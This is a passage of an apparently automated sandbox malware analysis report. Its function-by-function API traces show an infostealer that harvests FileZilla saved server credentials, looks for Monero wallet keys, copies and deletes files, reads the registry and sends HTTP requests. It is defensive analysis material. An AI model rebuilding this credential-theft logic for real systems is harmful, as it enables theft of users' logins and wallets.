                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 119e63144c435dc088dbd6add9070588762249716d2ce75e1323d1810cb9b9c0
                                  • Instruction ID: 0978c06b0b136d14f9eded556c29a04c2abba182e06286d72e7d782cf2536aa9
                                  • Opcode Fuzzy Hash: 119e63144c435dc088dbd6add9070588762249716d2ce75e1323d1810cb9b9c0
                                  • Instruction Fuzzy Hash: C44115F3E143248BE3446E6CDCC4366B6D5EB58320F1A063DDE99D3780EA7A6D058692
                                  Function 00549750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00540250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00550DBA,00550DB7,00550DB6,00550DB3), ref: 00540362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00540369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00540385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 005403CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 005403DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00540419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00540463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 0054051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 0054054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00540562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00540571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00540580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00540593
                                  • lstrcat.KERNEL32(?,00551678), ref: 005405A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 005405B5
                                  • lstrcat.KERNEL32(?,0055167C), ref: 005405C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 005405D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 005405E6
                                  • lstrcat.KERNEL32(?,00551688), ref: 005405F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00540604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00540617
                                  • lstrcat.KERNEL32(?,00551698), ref: 00540626
                                  • lstrcat.KERNEL32(?,0055169C), ref: 00540635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 0054068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 47028a9a9d2f1ab52e9fce41f0632ef7363f376f07d27be8ffd5bfab76100aaf
                                  • Instruction ID: 21298e50cb125a56336dcfec1aba4ab889aaeace820a08af2457683c0c27c97e
                                  • Opcode Fuzzy Hash: 47028a9a9d2f1ab52e9fce41f0632ef7363f376f07d27be8ffd5bfab76100aaf
                                  • Instruction Fuzzy Hash: B8D17672940109ABEB04FBF0DD5AEEE7B38FF94305F508418F506A6091DF74AA49CB66
                                  Function 00535960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005359F8
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 00535A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00535B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011FE8F8,00000000,?,011FA240,00000000,?,00551A1C), ref: 00535E71
                                  • lstrlen.KERNEL32(00000000), ref: 00535E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00535E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00535E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00535EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00535ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00535EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00535F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00535F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00535F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00535FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00535FBD
                                  • HttpOpenRequestA.WININET(00000000,011FE7A8,?,011FE158,00000000,00000000,00400100,00000000), ref: 00535BF8
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00535FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 00cbaaa633e39916c074f4ae8241550bdbe5036373c1f85126197af0bd145fc2
                                  • Instruction ID: 9a3b80e4ca1018e6a9db3cc260a58b7e3356074a92fbd1a71ac899f093b85a28
                                  • Opcode Fuzzy Hash: 00cbaaa633e39916c074f4ae8241550bdbe5036373c1f85126197af0bd145fc2
                                  • Instruction Fuzzy Hash: 45123272860119ABEB55EBA0DC99FEEBB78FF94704F404199F10A62091EF302B49CF55
                                  Function 0053CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0053D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0053D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D208
                                  • lstrcat.KERNEL32(?,00551478), ref: 0053D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D22A
                                  • lstrcat.KERNEL32(?,0055147C), ref: 0053D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D24C
                                  • lstrcat.KERNEL32(?,00551480), ref: 0053D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D26E
                                  • lstrcat.KERNEL32(?,00551484), ref: 0053D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D290
                                  • lstrcat.KERNEL32(?,00551488), ref: 0053D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D2B2
                                  • lstrcat.KERNEL32(?,0055148C), ref: 0053D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D2D4
                                  • lstrcat.KERNEL32(?,00551490), ref: 0053D2E3
                                    • Part of subcall function 0054A820: lstrlen.KERNEL32(00534F05,?,?,00534F05,00550DDE), ref: 0054A82B
                                    • Part of subcall function 0054A820: lstrcpy.KERNEL32(00550DDE,00000000), ref: 0054A885
                                  • lstrlen.KERNEL32(?), ref: 0053D32A
                                  • lstrlen.KERNEL32(?), ref: 0053D339
                                    • Part of subcall function 0054AA70: StrCmpCA.SHLWAPI(011F9288,0053A7A7,?,0053A7A7,011F9288), ref: 0054AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 486e88327117736d10eb2482313943e65a54f5a7e2c3a3fe50db20dd1fbfd7c0
                                  • Instruction ID: 20f4aa8fd17b473423d1d208e738bc657cf189ed8d944972c4cc1495084a6b69
                                  • Opcode Fuzzy Hash: 486e88327117736d10eb2482313943e65a54f5a7e2c3a3fe50db20dd1fbfd7c0
                                  • Instruction Fuzzy Hash: 99E17271950109ABEB44EBA0DD9AEEE7B78FF94309F104058F107B3091DE34AE49CB66
                                  Function 0053C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011FCE88,00000000,?,0055144C,00000000,?,?), ref: 0053CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0053CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0053CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0053CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0053CAD9
                                  • StrStrA.SHLWAPI(?,011FD0E0,00550B52), ref: 0053CAF7
                                  • StrStrA.SHLWAPI(00000000,011FCE28), ref: 0053CB1E
                                  • StrStrA.SHLWAPI(?,011FDAE0,00000000,?,00551458,00000000,?,00000000,00000000,?,011F9188,00000000,?,00551454,00000000,?), ref: 0053CCA2
                                  • StrStrA.SHLWAPI(00000000,011FDA60), ref: 0053CCB9
                                    • Part of subcall function 0053C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0053C871
                                    • Part of subcall function 0053C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0053C87C
                                  • StrStrA.SHLWAPI(?,011FDA60,00000000,?,0055145C,00000000,?,00000000,011F9248), ref: 0053CD5A
                                  • StrStrA.SHLWAPI(00000000,011F8FD8), ref: 0053CD71
                                    • Part of subcall function 0053C820: lstrcat.KERNEL32(?,00550B46), ref: 0053C943
                                    • Part of subcall function 0053C820: lstrcat.KERNEL32(?,00550B47), ref: 0053C957
                                    • Part of subcall function 0053C820: lstrcat.KERNEL32(?,00550B4E), ref: 0053C978
                                  • lstrlen.KERNEL32(00000000), ref: 0053CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0053CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 2c50872d96c0783c0af2e8e32894fb9b7463a8f6307418f5cb4d19540ad114a1
                                  • Instruction ID: 90604ec9562e4a93d7d459f96e3ca24d74d5cb5f31f8c471ab2758dbedfb601d
                                  • Opcode Fuzzy Hash: 2c50872d96c0783c0af2e8e32894fb9b7463a8f6307418f5cb4d19540ad114a1
                                  • Instruction Fuzzy Hash: F0E12F72840109ABEB54EBA0DC99FEEBB78FF94304F004159F10663191EF346A4ACF66
                                  Function 00548320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,011FB008,00000000,00020019,00000000,005505B6), ref: 005483A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00548426
                                  • wsprintfA.USER32 ref: 00548459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0054847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0054848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00548499
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
